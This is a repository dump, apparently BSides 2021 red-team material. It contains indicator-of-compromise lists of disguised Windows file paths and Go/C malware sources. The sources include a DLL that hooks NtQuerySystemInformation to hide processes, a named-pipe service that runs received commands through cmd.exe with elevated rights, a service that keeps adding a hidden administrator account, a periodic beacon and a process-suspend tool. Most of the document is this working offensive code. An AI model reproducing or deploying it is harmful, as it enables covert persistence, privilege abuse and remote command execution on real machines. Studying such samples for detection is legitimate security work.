C:\Windows\System32\bg-BG\nlaovc.mui 3 | C:\Windows\SysWOW64\hu-HU\Faultref.mui 4 | C:\Windows\SysWOW64\AdvancedInstallers\KBDTZO.db 5 | C:\Program Files\Internet Explorer\en-US\rtutias.com 6 | C:\Windows\SysWOW64\sv-SE\osuninsh.mui 7 | C:\Windows\System32\wbem\wbemoore.doc 8 | C:\Program Files (x86)\Common Files\System\MobileDevicesAddvn.mmc 9 | C:\Windows\System32\en\kdstsb.drv 10 | C:\Windows\SysWOW64\en\dot3ue.inf 11 | C:\Program Files\Common Files\System\ado\cavvbus.mmc 12 | C:\Windows\SysWOW64\AdvancedInstallers\EP0EXFSA.com 13 | C:\Windows\SysWOW64\ja-JP\fsus3setup.mui 14 | C:\Windows\WinSxS\wshnitbs.dll 15 | C:\Windows\SysWOW64\en\mdmntttl.mmc 16 | C:\Windows\SysWOW64\es-ES\ndikuio.mui 
17 | C:\Windows\SysWOW64\ar-SA\appmgmas.mui 18 | C:\Windows\SysWOW64\ar-SA\KBDARME.mui 19 | C:\Windows\Microsoft.NET\shpafacq.db 20 | C:\Windows\SysWOW64\hu-HU\DhcpServerPSPdovider.mui 21 | C:\Program Files\Common Files\System\msadc\NlsLexicons7039.drv 22 | C:\Windows\System32\drivers\mssmkios.inf 23 | C:\Program Files (x86)\Common Files\System\Ole DB\mojter40.rtf 24 | C:\Windows\System32\downlevel\PCOTpm12.ocx 25 | C:\Windows\apppatch\MFMediaEngibe.mui 26 | C:\Windows\System32\fr-FR\yetupcln.mui 27 | C:\Windows\System32\bg-BG\wupf.mui 28 | C:\Windows\System32\pt-BR\rom.mui 29 | C:\Windows\System32\config\RegBack\acpgpmi 30 | C:\Windows\System32\migwiz\NlrData0009.mmc 31 | C:\Windows\SysWOW64\en-US\wucltud.mui 32 | C:\Windows\System32\drivers\npmproxi.cab 33 | C:\Windows\apppatch\pxeroot.sys 34 | C:\Windows\System32\Com\wcmsfc.cab 35 | C:\Windows\System32\ro-RO\w3wphosr.mui 36 | C:\Windows\Microsoft.NET\wuaiclt.inf 37 | C:\Program Files (x86)\Common Files\System\ado\WSDPrgnt.drv 38 | C:\Windows\SysWOW64\hu-HU\dfnet.mui 39 | C:\Program Files\Internet Explorer\en-US\PhotoOase.dll 40 | C:\Windows\System32\ru-RU\weidcom.mui 41 | C:\Windows\System32\Boot\uimom.drv 42 | C:\Program Files\Common Files\System\prm0066.mmc 43 | C:\Program Files (x86)\Common Files\System\ado\MTConfmg.sys 44 | C:\Program Files\Common Files\System\Ole DB\CBDFC.mui 45 | C:\Windows\SysWOW64\en-US\logoncri.mui 46 | C:\Windows\SysWOW64\wbem\ActionCemterCPL.drv 47 | C:\Program Files (x86)\Common Files\System\Ole DB\AcGencal.rtf 48 | C:\Windows\pvnekcl2.db 49 | C:\Windows\SysWOW64\fr-FR\wcmari.mui 50 | C:\Windows\SysWOW64\wbem\alb.cab 51 | C:\Windows\System32\Com\wupuclt.mui 52 | C:\Windows\SysWOW64\config\Journal\ldhui 53 | C:\Windows\System32\it-IT\agildvpn.mui 54 | C:\Windows\SysWOW64\hr-HR\npfr.mui 55 | C:\Program Files\Common Files\System\ado\psieftp.mui 56 | C:\Program Files (x86)\Common Files\System\ado\RpnProxyMigrationPlugin.drv 57 | C:\Windows\System32\nb-NO\kups.mui 58 | 
C:\Windows\WinSxS\ABDIULAT.ini 59 | C:\Windows\System32\bg-BG\NesLexicons0027.mui 60 | C:\Program Files\Common Files\System\ado\iscwiwmi.sys 61 | C:\Program Files\Internet Explorer\en-US\KBDHMB.ini 62 | C:\Windows\System32\Configuration\quaucomp.drv 63 | C:\Program Files\Common Files\System\wlidcreoprov.rtf 64 | C:\Windows\SysWOW64\migwiz\msltfmig.db 65 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/beacon.go: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2021 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
15 | // 16 | package main 17 | 18 | import ( 19 | "net" 20 | "os" 21 | "time" 22 | ) 23 | 24 | func main() { 25 | for { 26 | n, err := net.DialTimeout("tcp", "", time.Second*5) 27 | if err != nil { 28 | println("err", err.Error()) 29 | return 30 | } 31 | n.Write([]byte("")) 32 | if n.Close(); len(os.Args) == 1 { 33 | break 34 | } 35 | time.Sleep(time.Minute * 2) 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/client.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | // Copyright (C) 2021 iDigitalFlame 5 | // 6 | // This program is free software: you can redistribute it and/or modify 7 | // it under the terms of the GNU General Public License as published by 8 | // the Free Software Foundation, either version 3 of the License, or 9 | // any later version. 10 | // 11 | // This program is distributed in the hope that it will be useful, 12 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | // GNU General Public License for more details. 15 | // 16 | // You should have received a copy of the GNU General Public License 17 | // along with this program. If not, see . 
18 | // 19 | package main 20 | 21 | import ( 22 | "os" 23 | 24 | "github.com/iDigitalFlame/xmt/com/pipe" 25 | ) 26 | 27 | func main() { 28 | if len(os.Args) < 2 { 29 | os.Exit(0) 30 | } 31 | 32 | u, err := pipe.Dial(pipe.Format("WinSockInitW")) 33 | if err != nil { 34 | os.Exit(1) 35 | } 36 | u.Write([]byte(os.Args[1])) 37 | u.Close() 38 | } 39 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/freeze.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | // Copyright (C) 2021 iDigitalFlame 5 | // 6 | // This program is free software: you can redistribute it and/or modify 7 | // it under the terms of the GNU General Public License as published by 8 | // the Free Software Foundation, either version 3 of the License, or 9 | // any later version. 10 | // 11 | // This program is distributed in the hope that it will be useful, 12 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | // GNU General Public License for more details. 15 | // 16 | // You should have received a copy of the GNU General Public License 17 | // along with this program. If not, see . 
18 | // 19 | package main 20 | 21 | import ( 22 | "os" 23 | "strconv" 24 | 25 | "github.com/iDigitalFlame/xmt/cmd" 26 | ) 27 | 28 | func main() { 29 | if len(os.Args) != 2 { 30 | os.Stderr.WriteString(os.Args[0] + " \n") 31 | os.Exit(1) 32 | } 33 | 34 | v, err := strconv.ParseUint(os.Args[1], 10, 32) 35 | if err != nil { 36 | panic(err) 37 | } 38 | 39 | if err := cmd.SuspendProcess(uint32(v)); err != nil { 40 | panic(err) 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/hook.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2021 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
15 | // 16 | 17 | // Windows Xp+ 18 | #define WINVER 0x0501 19 | #define _WIN32_WINNT 0x0501 20 | // Windows Vista+ 21 | // #define WINVER 0x0600 22 | // #define _WIN32_WINNT 0x0600 23 | 24 | #define NOCOMM 25 | #define WIN32_LEAN_AND_MEAN 26 | 27 | #include 28 | #include 29 | #include 30 | #include 31 | 32 | #define SIZE_JUMP 5 33 | #define SIZE_PATCH 19 34 | #define SIZE_IGNORE 7 35 | 36 | #define EXPORT __declspec(dllexport) 37 | 38 | // Included with auto-build 39 | #include "pac.h" 40 | 41 | typedef struct hook { 42 | HANDLE mutex; 43 | LPVOID target; 44 | unsigned char orig[SIZE_JUMP]; 45 | unsigned char patch[SIZE_JUMP]; 46 | } hook; 47 | typedef long long ptr; 48 | 49 | HANDLE mutexGlobal; 50 | 51 | unsigned char jump[SIZE_PATCH] = { 52 | 0x90, // nop 53 | 0x4C, 0x8B, 0xD0, // mv r10,rax 54 | 0x48, 0xB8, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // mv rax, 55 | 0x50, // push rax 56 | 0x49, 0x8B, 0xC2, // mv rax,r10 57 | 0xC3, // ret 58 | }; 59 | 60 | // These procs do NOT like hooks 61 | const char *ignored[SIZE_IGNORE] = { 62 | "DLLHost.exe\0", 63 | "LogonUI.exe\0", 64 | "regedit.exe\0", 65 | "consent.exe\0", 66 | "rundll32.exe\0", 67 | "werfault.exe\0", 68 | "taskhostex.exe\0" 69 | }; 70 | 71 | // ** HOOKS ** 72 | hook QuerySystemInfo; 73 | // ** END ** 74 | 75 | 76 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 77 | 78 | // Find returns an empty memory space (INT3 or NOPS) in the specified module within a 32bit 79 | // address zone +/- of the pointer base. 80 | // Returns 0 if the specified empty size cannot be found. 
81 | ptr Find(int size, ptr module, ptr func) { 82 | SIZE_T n; 83 | int c = 0; 84 | unsigned char b[1024]; 85 | for (ptr x = module; x < func+65535; x += 1024) { 86 | if (ReadProcessMemory(GetCurrentProcess(), (LPVOID)x, b, 1024, &n) == 0) { 87 | return 0; 88 | } 89 | for (int i = 0; i < n; i++) { 90 | if (b[i] == 0x90 || b[i] == 0xCC) { 91 | if (c >= size+1) { 92 | return x+i-size; 93 | } 94 | c++; 95 | continue; 96 | } 97 | c = 0; 98 | } 99 | } 100 | return 0; 101 | } 102 | 103 | // Redo will reapply the JMP and unlock the hook mutex. 104 | void Redo(hook *h) { 105 | SIZE_T n; 106 | WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 107 | ReleaseMutex(h->mutex); 108 | } 109 | // Undo will remove the hook JMP and will lock the hook mutex to prevent desync'd usage of the hook. 110 | void Undo(hook *h) { 111 | if (h->mutex == NULL || h->target == 0) { 112 | return; 113 | } 114 | WaitForSingleObject(h->mutex, INFINITE); 115 | SIZE_T n; 116 | WriteProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n); 117 | } 118 | // Hook will hook a function based on the provied handle, function pointer and replacement function. 119 | // The first argument is a pointer to a hook anchor. 120 | void Hook(hook *h, HANDLE mod, FARPROC func, ptr replacement) { 121 | if (mod == NULL || func == NULL || replacement == 0) { 122 | return; 123 | } 124 | ptr b = Find(SIZE_PATCH, (ptr)mod, (ptr)func); 125 | if (b == 0) { 126 | return; 127 | } 128 | SIZE_T n; 129 | h->target = (LPVOID)func; 130 | DWORD p; 131 | VirtualProtect(h->target, SIZE_JUMP, PAGE_EXECUTE_READWRITE, &p); 132 | if (ReadProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n) == 0 || n != SIZE_JUMP) { 133 | return; 134 | } 135 | if (h->orig[0] == 0xE9) { 136 | // Already hooked? 
137 | h->target = 0; 138 | return; 139 | } 140 | WaitForSingleObject(mutexGlobal, INFINITE); 141 | jump[13] = (replacement >> 56) & 0xFF; 142 | jump[12] = (replacement >> 48) & 0xFF; 143 | jump[11] = (replacement >> 40) & 0xFF; 144 | jump[10] = (replacement >> 32) & 0xFF; 145 | jump[9] = (replacement >> 24) & 0xFF; 146 | jump[8] = (replacement >> 16) & 0xFF; 147 | jump[7] = (replacement >> 8) & 0xFF; 148 | jump[6] = replacement & 0xFF; 149 | VirtualProtect((LPVOID)b, SIZE_PATCH, PAGE_EXECUTE_READWRITE, &p); 150 | if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)b, jump, SIZE_PATCH, &n) == 0 || n != SIZE_PATCH) { 151 | ReleaseMutex(mutexGlobal); 152 | return; 153 | } 154 | ptr d = (b - 4) - (ptr)func; 155 | h->patch[4] = (d >> 24) & 0xFF; 156 | h->patch[3] = (d >> 16) & 0xFF; 157 | h->patch[2] = (d >> 8) & 0xFF; 158 | h->patch[1] = d & 0xFF; 159 | h->patch[0] = 0xE9; 160 | DWORD r = WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 161 | ReleaseMutex(mutexGlobal); 162 | if (r == 0 || n != SIZE_JUMP) { 163 | return; 164 | } 165 | h->mutex = CreateMutex(NULL, FALSE, NULL); 166 | } 167 | void Xor(unsigned char* key, int key_size, unsigned char* data, int data_size) { 168 | if (key_size <= 0 || data_size <= 0) { 169 | return; 170 | } 171 | DWORD o; 172 | VirtualProtect(data, data_size+1, PAGE_READWRITE, &o); 173 | for (int i = 0; i < data_size; i++) { 174 | data[i] = data[i] ^ key[i % key_size]; 175 | } 176 | VirtualProtect(data, data_size+1, o, &o); 177 | } 178 | 179 | int IndexOf(WCHAR *src, int src_len, const char *find, int find_len) { 180 | if (find_len > src_len) { 181 | return -1; 182 | } 183 | int f = find_len - 1, t = find_len - 1; 184 | for (int x = src_len - 1; x >= 0; x--) { 185 | if (src[x] == 0) { 186 | continue; 187 | } 188 | if (src[x] == find[f]) { 189 | f--; 190 | } else if (src[x] > 96 && find[f]+32 == src[x]) { 191 | f--; 192 | } else if (find[f] > 96 && src[x]+32 == find[f]) { 193 | f--; 194 | } else { 195 | if (f < t) 
{ 196 | x++; 197 | } 198 | f = t; 199 | } 200 | if (f < 0) { 201 | return src_len-(src_len-x); 202 | } 203 | if (f == t && x < find_len) { 204 | return -1; 205 | } 206 | } 207 | return -1; 208 | } 209 | 210 | BOOL ValidProcess(WCHAR *src, int src_len) { 211 | if (src_len == 0) { 212 | return FALSE; 213 | } 214 | for (int i = 0; i < EXEC_SIZE; i++) { 215 | if (IndexOf(src, src_len, pacData[i], pacSize[i]) != -1) { 216 | return TRUE; 217 | } 218 | } 219 | return FALSE; 220 | } 221 | BOOL IgnoredAttach(WCHAR *src, int src_len) { 222 | for (int i = 0; i < SIZE_IGNORE; i++) { 223 | if (IndexOf(src, src_len, ignored[i], strlen(ignored[i])) != -1) { 224 | return TRUE; 225 | } 226 | } 227 | return FALSE; 228 | } 229 | 230 | EXPORT BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID args) { 231 | if (r == DLL_PROCESS_ATTACH) { 232 | WCHAR s[256]; 233 | int n = GetModuleFileNameW(NULL, (LPWSTR)s, MAX_PATH); 234 | if (n > 0 && IgnoredAttach(s, n)) { 235 | return TRUE; 236 | } 237 | for (int i = 0; i < LIST_SIZE; i++) { 238 | Xor(pacKey, KEY_SIZE, pacData[i], pacSize[i]); 239 | } 240 | HANDLE a = LoadLibraryW(L"ntdll.dll"); 241 | Hook(&QuerySystemInfo, a, GetProcAddress(a, "NtQuerySystemInformation"), (ptr)&QuerySystemInfoFunc); 242 | } else if (r == DLL_PROCESS_DETACH) { 243 | Undo(&QuerySystemInfo); 244 | } 245 | return TRUE; 246 | } 247 | 248 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS class, PVOID info, ULONG size, PULONG ret) { 249 | Undo(&QuerySystemInfo); 250 | NTSTATUS r = NtQuerySystemInformation(class, info, size, ret); 251 | Redo(&QuerySystemInfo); 252 | if (size == 0 || r != 0x00000000 || class != SystemProcessInformation) { 253 | return r; 254 | } 255 | PSYSTEM_PROCESS_INFORMATION n = (PSYSTEM_PROCESS_INFORMATION)info; 256 | if (n->NextEntryOffset == 0) { 257 | return r; 258 | } 259 | DWORD p = GetCurrentProcessId(); 260 | PSYSTEM_PROCESS_INFORMATION c = NULL; 261 | while (n->NextEntryOffset != 0) { 262 | c = 
(PSYSTEM_PROCESS_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 263 | if ((DWORD)(c->UniqueProcessId) == p || !ValidProcess(c->ImageName.Buffer, c->ImageName.Length)) { 264 | n = c; 265 | continue; 266 | } 267 | if (c->NextEntryOffset == 0) { 268 | n->NextEntryOffset = 0; 269 | } 270 | n->NextEntryOffset += c->NextEntryOffset; 271 | } 272 | return r; 273 | } 274 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/server.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | // Copyright (C) 2021 iDigitalFlame 5 | // 6 | // This program is free software: you can redistribute it and/or modify 7 | // it under the terms of the GNU General Public License as published by 8 | // the Free Software Foundation, either version 3 of the License, or 9 | // any later version. 10 | // 11 | // This program is distributed in the hope that it will be useful, 12 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | // GNU General Public License for more details. 15 | // 16 | // You should have received a copy of the GNU General Public License 17 | // along with this program. If not, see . 
18 | // 19 | package main 20 | 21 | import ( 22 | "bytes" 23 | "io" 24 | "net" 25 | "strings" 26 | "sync" 27 | 28 | "github.com/iDigitalFlame/xmt/cmd" 29 | "github.com/iDigitalFlame/xmt/com/pipe" 30 | "github.com/iDigitalFlame/xmt/device/devtools" 31 | ) 32 | 33 | var bufs = sync.Pool{ 34 | New: func() interface{} { 35 | return new(bytes.Buffer) 36 | }, 37 | } 38 | 39 | func main() { 40 | (&devtools.Service{Start: listen}).Run() 41 | } 42 | func listen() { 43 | l, err := pipe.ListenPerms(pipe.Format("WinSockInitW"), pipe.PermEveryone) 44 | if err != nil { 45 | panic(err) 46 | } 47 | for { 48 | c, err := l.Accept() 49 | if err != nil { 50 | e, ok := err.(net.Error) 51 | if ok && e.Timeout() { 52 | continue 53 | } 54 | if ok && !e.Timeout() && !e.Temporary() { 55 | break 56 | } 57 | continue 58 | } 59 | b := bufs.Get().(*bytes.Buffer) 60 | io.Copy(b, c) 61 | c.Close() 62 | e := cmd.NewProcess("cmd.exe", "/c", strings.ReplaceAll(string(b.Bytes()), "\n", "")) 63 | b.Reset() 64 | e.Dir = "C:\\" 65 | bufs.Put(b) 66 | e.SetNoWindow(true) 67 | e.SetWindowDisplay(0) 68 | e.SetParent(cmd.F().SetElevated(true).SetSession(false)) 69 | e.Start() 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /BSidesDE-2021/Souces/user.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | // Copyright (C) 2021 iDigitalFlame 5 | // 6 | // This program is free software: you can redistribute it and/or modify 7 | // it under the terms of the GNU General Public License as published by 8 | // the Free Software Foundation, either version 3 of the License, or 9 | // any later version. 10 | // 11 | // This program is distributed in the hope that it will be useful, 12 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | // GNU General Public License for more details. 
15 | // 16 | // You should have received a copy of the GNU General Public License 17 | // along with this program. If not, see . 18 | // 19 | package main 20 | 21 | import ( 22 | "strconv" 23 | "time" 24 | 25 | "github.com/iDigitalFlame/xmt/cmd" 26 | "github.com/iDigitalFlame/xmt/device/devtools" 27 | ) 28 | 29 | const userName = "BruhWhat" 30 | 31 | var count = 0 32 | 33 | func main() { 34 | (&devtools.Service{Exec: generate, Interval: time.Second * 30}).Run() 35 | } 36 | func generate() { 37 | p := cmd.NewProcess("cmd.exe", "/c", "net user "+userName+" "+strconv.Itoa(count)+" HelloThere /add") 38 | p.Dir = "C:\\" 39 | p.SetParent(cmd.F().SetElevated(true)) 40 | p.SetWindowDisplay(0) 41 | p.Run() 42 | p = cmd.NewProcess("cmd.exe", "/c", "net localgroup Administrators "+userName+" "+strconv.Itoa(count)+" /add") 43 | p.Dir = "C:\\" 44 | p.SetParent(cmd.F().SetElevated(true)) 45 | p.SetWindowDisplay(0) 46 | p.Run() 47 | } 48 | -------------------------------------------------------------------------------- /BSidesLV-2021/IOCs/IOCs.txt: -------------------------------------------------------------------------------- 1 | # IOCs 2 | 3 | These files are some indicators that were accessed by the executor files. 
4 | 5 | C:\Windows\SysWOW64\fr-FR\mssmdm.mui 6 | C:\Windows\SysWOW64\et-EE\wwapi.mui 7 | C:\Windows\SysWOW64\da-DK\xpssermices.mui 8 | C:\Windows\System32\fr-FR\swell32.mui 9 | C:\Windows\System32\cs-CZ\ladrs411.mui 10 | C:\Windows\System32\Configuration\IMJPKJIC.db 11 | C:\Windows\System32\msctfmia.sys 12 | C:\Windows\SysWOW64\cs-CZ\imagerds.mui 13 | C:\Windows\security\clretwrn.rtf 14 | C:\Windows\SysWOW64\hr-HR\netvwisimp.mui 15 | C:\Program Files (x86)\Common Files\System\ado\vsmrafd.mmc 16 | C:\Program Files\Common Files\System\svrmfg.rtf 17 | C:\Windows\SysWOW64\config\scwangf 18 | C:\Windows\SysWOW64\AdvancedInstallers\ibfoctrs.doc 19 | C:\Windows\Microsoft.NET\fbdfar.drv 20 | C:\Windows\System32\dmvdjitf.ocx 21 | C:\Windows\SysWOW64\en-US\sdbhs.mui 22 | C:\Windows\System32\zh-CN\logcuat.mui 23 | C:\Windows\SysWOW64\wbem\usbmlgplugin.ini 24 | C:\Windows\System32\fr-FR\amdppe.mui 25 | C:\Windows\SysWOW64\ar-SA\wkaucpl.mui 26 | C:\Windows\SysWOW64\da-DK\MOEAgent.mui 27 | C:\Windows\SysWOW64\da-DK\iologksg.mui 28 | C:\Windows\SysWOW64\ja-JP\AppXDeploymentCliert.mui 29 | C:\Windows\System32\setup\lgcense.db 30 | C:\Windows\Provisioning\oskninst.inf 31 | C:\Windows\SysWOW64\zh-TW\ibbys.mui 32 | C:\Windows\SysWOW64\zh-TW\KPDSP.mui 33 | C:\Windows\SysWOW64\en\EventLogMespages.dll 34 | C:\Windows\SysWOW64\downlevel\wwqninst.mui 35 | C:\Program Files\Common Files\System\Ole DB\bxvwda.ocx 36 | C:\Windows\System32\ru-RU\vsswni.mui 37 | C:\Program Files (x86)\Internet Explorer\en-US\iudiodev.com 38 | C:\Windows\Microsoft.NET\tiffbilt.rtf 39 | C:\Windows\SysWOW64\ja-JP\OLHelper.mui 40 | C:\Windows\System32\config\RegBack\KBDESN 41 | C:\Windows\SysWOW64\config\tasklchd 42 | C:\Windows\SysWOW64\oobe\wuauenh.ini 43 | C:\Windows\SysWOW64\en-GB\shfmeng.mui 44 | C:\Windows\SysWOW64\da-DK\certorop.mui 45 | C:\Windows\System32\migration\adlclient.dll 46 | C:\Windows\System32\AdvancedInstallers\usouhci.sys 47 | C:\Windows\SysWOW64\cs-CZ\wdscowe.mui 48 | 
C:\Windows\SysWOW64\fr-FR\JordpadFilter.mui 49 | C:\Windows\System32\Sysprep\wxaueng.drv 50 | C:\Windows\SyncSharvTTLib.mmc 51 | C:\Windows\SysWOW64\dft3dlg.db 52 | C:\Windows\SysWOW64\Dism\KBQSN1.ocx 53 | C:\Windows\System32\oobe\ernekcl2.sys 54 | C:\Windows\Microsoft.NET\OSProvimer.inf 55 | C:\Windows\SysWOW64\config\processt 56 | C:\Windows\Microsoft.NET\ppeboot.sys 57 | C:\Windows\System32\downlevel\wuspi.db 58 | C:\Windows\System32\en\xsbceip.db 59 | C:\Windows\SysWOW64\cs-CZ\infocmrs.mui 60 | C:\Windows\SysWOW64\et-EE\bifcoe.mui 61 | C:\Windows\System32\pt-BR\shyolder.mui 62 | C:\Windows\System32\Sysprep\tqqery.dll 63 | C:\Program Files\Internet Explorer\en-US\cdaom.dll 64 | C:\Program Files (x86)\Internet Explorer\oclWdi.doc 65 | C:\Windows\SysWOW64\es-ES\veoinput.mui 66 | C:\Windows\SysWOW64\da-DK\DiagEpl.mui 67 | C:\Windows\servicing\clbcaxq.db 68 | C:\Program Files (x86)\Internet Explorer\wuaucgt.ocx 69 | C:\Windows\SysWOW64\bg-BG\gpprefhl.mui 70 | C:\Windows\System32\pt-BR\BCMWL63AB.mui 71 | C:\Windows\System32\dsc\wlanueil.doc 72 | C:\Windows\System32\alsldpc.ocx 73 | C:\Windows\System32\AdvancedInstallers\NdisImPlaxform.mui 74 | C:\Windows\System32\bg-BG\bitserx6.mui 75 | C:\Windows\SysWOW64\netcwgx.mui 76 | C:\Windows\System32\ko-KR\ibsvc.mui 77 | C:\Program Files (x86)\Common Files\System\msadc\pln.sys 78 | C:\Windows\SysWOW64\downlevel\MsoIdcroWrapper.ini 79 | C:\Windows\Panther\msidcrl49.doc 80 | C:\Windows\SysWOW64\zh-TW\EAPQHC.mui 81 | C:\Windows\servicing\vls.sys 82 | C:\Windows\System32\ko-KR\ZininetPlugin.mui 83 | C:\Windows\System32\it-IT\uoadperf.mui 84 | C:\Windows\System32\drivers\en-US\WXSls.mui 85 | C:\Windows\SysWOW64\ar-SA\cmsjplua.mui 86 | C:\Program Files\Common Files\System\msadc\MsSpnllCheckingFacility.db 87 | C:\Windows\System32\zh-TW\sgwga.mui 88 | C:\Windows\SysWOW64\ar-SA\webengiie.mui 89 | C:\Windows\SysWOW64\config\RegBack\wmk 90 | C:\Windows\cmllite.doc 91 | C:\Windows\SysWOW64\mamsonyu.mui 92 | 
C:\ProgramData\Microsoft\Windows\Caches\HPScanTSDrvXn8.inf 93 | C:\Program Files (x86)\Common Files\System\Ole DB\wuwlb.db 94 | C:\Windows\Microsoft.NET\mdqgsm.mmc 95 | C:\Windows\System32\migwiz\RTV8192su.mmc 96 | C:\Windows\System32\ru-RU\BCP77Langs.mui 97 | C:\Windows\System32\config\BRIBEN92 98 | C:\Windows\SysWOW64\setup\bqmapi.doc 99 | C:\Windows\SysWOW64\Dism\BRIBRYM00.com 100 | C:\Windows\SysWOW64\et-EE\wuaveng.mui 101 | C:\Windows\SysWOW64\downlevel\iqlogmsg.inf 102 | C:\Windows\SysWOW64\setup\gl2300.com 103 | C:\Windows\SysWOW64\pcu.mui 104 | C:\Windows\Provisioning\dmgskres.inf 105 | C:\Windows\System32\downlevel\tuser.ocx 106 | C:\Windows\System32\setup\wusetbp.rtf 107 | C:\Windows\SysWOW64\es-ES\sxshaeed.mui 108 | C:\ProgramData\Microsoft\Windows\Caches\SRT.mui 109 | C:\Windows\System32\pt-BR\wmips.mui 110 | C:\Windows\System32\ro-RO\bcryvt.mui 111 | C:\Windows\SysWOW64\Com\crypsbase.db 112 | C:\Program Files\Common Files\System\Ole DB\commase.mui 113 | C:\Windows\System32\config\RegBack\WSSercice 114 | C:\Windows\SysWOW64\et-EE\vbsqript.mui 115 | C:\Windows\System32\wbem\KBDINBEH.db 116 | C:\Windows\System32\oobe\PowerWmiPhovider.mmc 117 | C:\Windows\SysWOW64\Sysprep\EveetAggregation.drv 118 | C:\Windows\System32\pt-BR\viatrace.mui 119 | C:\Windows\System32\bg-BG\pmrfnet.mui 120 | C:\Windows\SysWOW64\Com\WYDScan.drv 121 | C:\Program Files (x86)\Internet Explorer\en-US\TLBAEF.sys 122 | C:\Windows\SysWOW64\config\wupq 123 | C:\Windows\System32\oobe\dbskmon.cab 124 | C:\Windows\SysWOW64\config\Journal\dxtrsft 125 | C:\Windows\System32\migration\MUILanguageClyanup.doc 126 | C:\Windows\System32\nb-NO\neroexts.mui 127 | C:\Windows\System32\AdvancedInstallers\WMIsac.inf 128 | C:\Windows\System32\wbem\iesyspxep.doc 129 | C:\Windows\System32\Sysprep\PtlsAuth.inf 130 | C:\Windows\servicing\rasctss.com 131 | C:\Windows\System32\sk-SK\rups.mui 132 | C:\Windows\System32\config\Journal\vmrdvnore 133 | C:\Program Files\Common Files\System\ado\klxstor.ini 134 | 
C:\Windows\SysWOW64\pt-BR\pdnlxclw.mui 135 | C:\Program Files\Internet Explorer\en-US\msiltceg.rtf 136 | C:\Windows\System32\wbem\tetdacim.db 137 | C:\Windows\System32\Dism\dmdskros2.com 138 | C:\Windows\SysWOW64\drivers\craehdmp.inf 139 | C:\Windows\Panther\KBSKNI.com 140 | C:\Windows\System32\Boot\hiddiwi.doc 141 | C:\Windows\System32\cs-CZ\coictl32.mui 142 | C:\Windows\System32\Sysprep\isnewmi.drv 143 | C:\Windows\System32\es-ES\vofflvs.mui 144 | C:\Windows\System32\Boot\QSSync.doc 145 | C:\Windows\SysWOW64\ja-JP\cavhuri.mui 146 | C:\Program Files\Common Files\System\msadc\KPDCZ2.db 147 | C:\Windows\WinSxS\mprsnop.rtf 148 | C:\Windows\System32\config\cmupil 149 | C:\Windows\SysWOW64\zh-TW\nrsi.mui 150 | C:\Windows\System32\AdvancedInstallers\HlsLexicons0c1a.ini 151 | C:\Program Files (x86)\Common Files\System\msadc\user35.mmc 152 | C:\Windows\System32\Sysprep\smbiirect.inf 153 | C:\Windows\SysWOW64\sv-SE\Vij.mui 154 | C:\Windows\System32\migration\secureboolai.com 155 | C:\Windows\perhctrs.cab 156 | C:\Windows\System32\drivers\WMPhoco.cab 157 | C:\Windows\SysWOW64\en\AfpIdPolicyEngineApi.inf 158 | C:\Windows\SysWOW64\Com\kbdneiat.ini 159 | C:\Windows\System32\ru-RU\qxva2.mui 160 | C:\Windows\SysWOW64\et-EE\NlsLeuicons0414.mui 161 | C:\Windows\System32\tlethk32.mmc 162 | C:\Program Files (x86)\Common Files\System\WmiPerfRnst.inf 163 | C:\Windows\SysWOW64\ar-SA\cvc.mui 164 | C:\Windows\System32\fr-FR\dhcpnnap.mui 165 | C:\Windows\System32\ko-KR\WinMsoIrmProtecjor.mui 166 | 